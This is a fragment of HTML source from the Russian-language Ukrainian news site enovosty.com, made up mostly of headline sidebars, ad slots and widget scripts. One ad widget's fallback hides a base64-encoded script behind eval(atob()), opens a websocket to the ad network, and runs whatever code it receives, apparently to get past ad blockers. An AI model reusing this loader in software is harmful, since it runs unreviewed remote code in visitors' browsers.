href="https://enovosty.com/news_politics/full/1212-proderzhalsya-vsego-den-serial-sluga-naroda-proderzhalsya-v-efire-rf-odin-den">Продержался всего день: Сериал "Слуга народа" продержался в эфире РФ один день (2742)</a></h3><h3 class="press"><a href="https://enovosty.com/news_politics/full/1312-francuzskij-issledovatel-rasskazal-kogda-rossiya-mozhet-otdat-donbass">Французский исследователь рассказал, когда Россия может отдать Донбасс (2650)</a></h3></div> </div> <br /> <!--<script type='text/javascript'>admixerML.fn.push(function() {admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph: 'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script>--><div id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069' style="margin:0 auto"></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script> <div class="bannerB" style="margin:0px 0 10px 100px;" ><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block;margin:10px auto;width:468px;height:60px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="1931703904"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script></div><br /><div id="pop_video" style="margin:10px 0;clear: both;"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="8"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-auto/full/1012-ilon-mask-priexal-v-restoran-na-tesla-cybertruck-ne-oboshlos-bez-incidenta-video"><img width="137" height="85" alt="Илон Маск приехал в ресторан на Tesla Cybertruck: не обошлось без инцидента" src="https://enovosty.com/wp-content/uploads/2019/12/0bb73c90d01ac012568ce6def86c3b5d_ce_1242x662x0x0_cropped_800x427-e1575973624854.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-auto/full/1012-ilon-mask-priexal-v-restoran-na-tesla-cybertruck-ne-oboshlos-bez-incidenta-video">Илон Маск приехал в ресторан на Tesla Cybertruck: не обошлось без инцидента</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/1012-dtp-v-kieve-v-seti-opublikovali-moment-padeniya-avtomobilya-s-mosta-video"><img width="137" height="85" alt="ДТП в Киеве: в Сети опубликовали момент падения автомобиля с моста" src="https://enovosty.com/wp-content/uploads/2019/12/screenshot_1-3-e1575973387288.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/1012-dtp-v-kieve-v-seti-opublikovali-moment-padeniya-avtomobilya-s-mosta-video">ДТП в Киеве: в Сети опубликовали момент падения автомобиля с моста</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/1112-znatnyj-maxach-takoj-draki-nardepov-verxovnaya-rada-davno-ne-videla-video"><img width="137" height="85" alt="Знатный махач: Такой драки нардепов Верховная Рада давно не видела" src="https://enovosty.com/wp-content/uploads/2019/12/draka.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1112-znatnyj-maxach-takoj-draki-nardepov-verxovnaya-rada-davno-ne-videla-video">Знатный махач: Такой драки нардепов Верховная Рада давно не видела</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_technology/full/1212-britanskij-voenno-morskoj-flot-prinyal-na-vooruzhenie-vtoroj-avianosec-video"><img width="137" height="85" alt="Британский военно-морской флот принял на вооружение второй авианосец" src="https://enovosty.com/wp-content/uploads/2019/12/screenshot_5-3-e1576144807575.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_technology/full/1212-britanskij-voenno-morskoj-flot-prinyal-na-vooruzhenie-vtoroj-avianosec-video">Британский военно-морской флот принял на вооружение второй авианосец</a></div></td></tr><tr><td class="view"><span><i></i>2840</span></td><td class="view"><span><i></i>2226</span></td><td class="view"><span><i></i>2205</span></td><td class="view last"><span><i></i>1929</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/1312-v-seti-pokazali-kak-na-dannyj-moment-vyglyadit-glavnaya-elka-ukrainy-foto"><img width="137" height="85" alt="В Сети показали, как на данный момент выглядит главная елка Украины" src="https://enovosty.com/wp-content/uploads/2019/12/screenshot_21-e1576177421995.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/1312-v-seti-pokazali-kak-na-dannyj-moment-vyglyadit-glavnaya-elka-ukrainy-foto">В Сети показали, как на данный момент выглядит главная елка Украины</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news-culture/full/1112-polskaya-pisatelnica-s-ukrainskimi-kornyami-poluchila-nobelevskuyu-premiyu-po-literature-video"><img width="137" height="85" alt="Польская писательница с украинскими корнями получила Нобелевскую премию по литературе" src="https://enovosty.com/wp-content/uploads/2019/12/screenshot_4-2-e1576061171799.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-culture/full/1112-polskaya-pisatelnica-s-ukrainskimi-kornyami-poluchila-nobelevskuyu-premiyu-po-literature-video">Польская писательница с украинскими корнями получила Нобелевскую премию по литературе</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/politika-video/full/912-v-parizhe-aktivisty-nackorpusa-prizvali-zelenskogo-ne-idti-na-ustupki-putinu"><img width="137" height="85" alt="В Париже ветераны АТО призвали Зеленского не идти на уступки Путину" src="https://enovosty.com/wp-content/uploads/2019/12/71_tn.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/politika-video/full/912-v-parizhe-aktivisty-nackorpusa-prizvali-zelenskogo-ne-idti-na-ustupki-putinu">В Париже ветераны АТО призвали Зеленского не идти на уступки Путину</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/proishestviya-video/full/1212-v-odnom-iz-supermarketov-xarkova-zametili-nastoyashhuyu-obezyanu-video"><img width="137" height="85" alt="В одном из супермаркетов Харькова заметили настоящую обезьяну" src="https://enovosty.com/wp-content/uploads/2019/12/screenshot_2-4-e1576143644477.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/proishestviya-video/full/1212-v-odnom-iz-supermarketov-xarkova-zametili-nastoyashhuyu-obezyanu-video">В одном из супермаркетов Харькова заметили настоящую обезьяну</a></div></td></tr><tr><td class="view"><span><i></i>1156</span></td><td class="view"><span><i></i>1033</span></td><td class="view"><span><i></i>925</span></td><td class="view last"><span><i></i>857</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1612-kongress-vstal-na-zashhitu-ukraincev-u-trampa-gotovyat-nakazanie-dlya-putinu" rel="bookmark">Конгресс встал на защиту украинцев: У Трампа готовят наказание для Путину</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1612-ssha-i-kitaj-dogovorilis-o-peremirii-v-torgovoj-vojne" rel="bookmark">США и Китай договорились о перемирии в торговой войне</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1312-nemcy-nabrosilis-na-ssha-iz-za-gazoprovoda-putina" rel="bookmark">Немцы набросились на США из-за "газопровода Путина"</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1312-ne-otstayut-za-shtatami-evropejskij-sovet-udaril-sankciyami-po-rf" rel="bookmark">Не отстают за Штатами: Европейский совет ударил санкциями по РФ</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1212-ssha-nanesli-udar-po-severnomu-potoku-2-detali" rel="bookmark">США нанесли удар по "Северному потоку-2". Детали</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1012-vylivanie-deneg-v-yamu-ssha-potratili-na-vosstanovlenie-afganistana-bolshe-chem-na-poslevoennuyu-evropu" rel="bookmark">"Выливание денег в яму": США потратили на восстановление Афганистана больше, чем на послевоенную Европу</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1012-v-ssha-prinyali-vazhnoe-reshenie-po-voennoj-pomoshhi-ukraine" rel="bookmark">В США приняли важное решение по военной помощи Украине</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1012-ponormar-rasskazal-o-dogovore-ssha-i-rf-po-ukraine" rel="bookmark">Понормарь рассказал о договоре США и РФ по Украине</a><br /></td> </tr><tr></tr></table></div> <div class="wiget simple_pr" style="border-left:none; border-right:none;" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_abroad/full/1512-model-poyavilas-na-publike-v-prozrachnom-plate-chem-vyzvala-azhiotazh-v-socsetyax-foto">Модель появилась на публике в прозрачном платье, чем вызвала ажиотаж в соцсетях (ФОТО) (2787)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1512-amerikanskij-esminec-v-soprovozhdenii-rossijskix-voennyx-voshyol-v-chyornoe-more-foto">Американский эсминец в сопровождении российских военных вошёл в Чёрное море (ФОТО) (2777)</a></p><p class="press"><a href="https://enovosty.com/news-markets/full/1612-rynok-truda-v-ukraine-nazvany-samye-populyarnye-i-vysokooplachivaemye-professii-goda">Рынок труда в Украине: Названы самые популярные и высокооплачиваемые профессии года (2395)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1612-sudba-kurilskix-ostrovov-obostrenie-otnoshenij-rossii-i-yaponii">Судьба Курильских островов: обострение отношений России и Японии (2026)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1612-dvazhdy-byl-otravlen-advokat-trampa-sdelal-sensacionnoe-zayavlenie-ob-ukraine">Дважды был отравлен: Адвокат Трампа сделал сенсационное заявление об Украине (1283)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1512-merkel-germaniya-nuzhdaetsya-v-kvalificirovannyx-rabotnikax-iz-raznyx-stran">Меркель: Германия нуждается в квалифицированных работниках из разных стран (948)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1512-v-ssha-razrabatyvayut-raketu-ubijcu-rossijskix-s-400">В США разрабатывают ракету -"убийцу" российских С-400 (921)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1612-klimkin-rasskazal-kakie-goroda-nuzhny-putinu">Климкин рассказал, какие города нужны Путину (783)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/1612-vms-ssha-pokazali-kak-pryamo-v-more-avianosec-theodore-roosevelt-provodit-dozapravku-foto">ВМС США показали, как прямо в море авианосец Theodore Roosevelt проводит дозаправку (ФОТО) (759)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1612-cel-byla-drugaya-moskva-ubila-sheremeta-sluchajno-i-ispolzovala-dlya-statistiki-mnenie">Цель была другая: Москва убила Шеремета случайно и использовала для статистики, - мнение (658)</a></p></div> </div> <div class="bannerB" style="margin:10px 0 10px 100px;" ><div id="phoenix57768bd94f32fe17ccf62bcd"></div> <script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57768bd94f32fe17ccf62bcd";</script> <script src="//phoenix-widget.com/static/js/jsonp.js"></script></div>   </div><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id="adriver_banner_C1"></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/912-pochemu-pered-remontom-nuzhen-dizajn-proekt">Почему перед ремонтом нужен дизайн-проект?</a></p><p class="press"><a href="https://enovosty.com/publications/full/2810-investiciyam-zdes-ne-mesto">Инвестициям здесь не место</a></p></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/2711-tot-kto-budet-predlagat-strane-gorkie-pilyuli-vsegda-proigraet-torgovcam-sladkim-placebo"><img alt="Тот, кто будет предлагать стране горькие пилюли – всегда проиграет торговцам сладким плацебо" src="https://enovosty.com/wp-content/uploads/2019/11/kazarin-112x101.jpg"><div></div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/2711-tot-kto-budet-predlagat-strane-gorkie-pilyuli-vsegda-proigraet-torgovcam-sladkim-placebo">Тот, кто будет предлагать стране горькие пилюли – всегда проиграет торговцам сладким плацебо</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/2711-tot-kto-budet-predlagat-strane-gorkie-pilyuli-vsegda-proigraet-torgovcam-sladkim-placebo">В Украине есть «секта свидетелей идеального избирателя». Эти люди боготворят обывателя. «Маленький человек» для них – это носитель финальной правды, ...</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_politics/full/912-yolkin-svezhej-karikaturoj-izobrazil-krasnye-linii-zelenskogo">Ёлкин свежей карикатурой изобразил "красные линии" Зеленского (12345)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1412-nazvan-ukrainskij-gorod-s-samoj-nizkoj-prestupnostyu">Назван украинский город с самой низкой преступностью (7736)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/1412-v-ukraine-zamechen-ocherednoj-korol-avtoxamov-foto">В Украине замечен очередной «король автохамов» (ФОТО) (6964)</a></p></div></div></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><div id="riainfo_015d2e7c4ce2cda608aa710275088255" onclick="trackOutboundLink(this, 'DomRia', 'dom.ria.com');"></div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div><a href="https://enovosty.com/markets/full/912-vykupat-200-tysyach-gektarov-zemli-smogut-tolko-krupnye-finansovye-spekulyanty-sergej-sobolev" target="_blank"><img alt="Сергей Соболев" src="https://enovosty.com/wp-content/themes/eizvestia/img/Sobolev.jpg"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/project/5571/" target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/Dopomoga1.jpg" alt="help"></a></div><br><div id="bn77"></div> <script> (function (w, d, n, s, t, j = 0) { function b() { w[n] = w[n] || []; w[n].push(function () { Week.render({ blockId: "77", renderTo: "bn77", async: true }); }); t = d.getElementsByTagName("script")[0]; s = d.createElement("script"); s.type = "text/javascript"; s.src = "https://ext.week.news/wl.js"; s.async = true; t.parentNode.insertBefore(s, t); s.onerror = function () { j++; s.parentNode.removeChild(s); if (j <= 10) setTimeout(b, 100); }; } b(); }) (this, this.document, 'weekCallbacks'); </script><br><script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script><div id="300-290"></div><script type="text/javascript">new MTr('300-290', {site:907,format:0});</script> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <div class="wiget simple_pr"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="blogTitle"><p style="font-size:8pt;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=532&pid=11721" rel="bookmark">10 самых крайних точек мира</a></p><div style="text-align:center;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=532&pid=11721" rel="bookmark"> <img alt="Фото недели" src="https://enovosty.com/wp-content/gallery/tochki/thumbs/thumbs_capes04.jpg"></a></div></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4786633"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript'>
var pollsL10n = {"ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435\u2026","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043e\u0442\u0432\u0435\u0442\u0430.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0451\u043d\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u044b\u0431\u0438\u0440\u0430\u0435\u043c\u044b\u0445 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/wp-polls/polls.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4786633","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
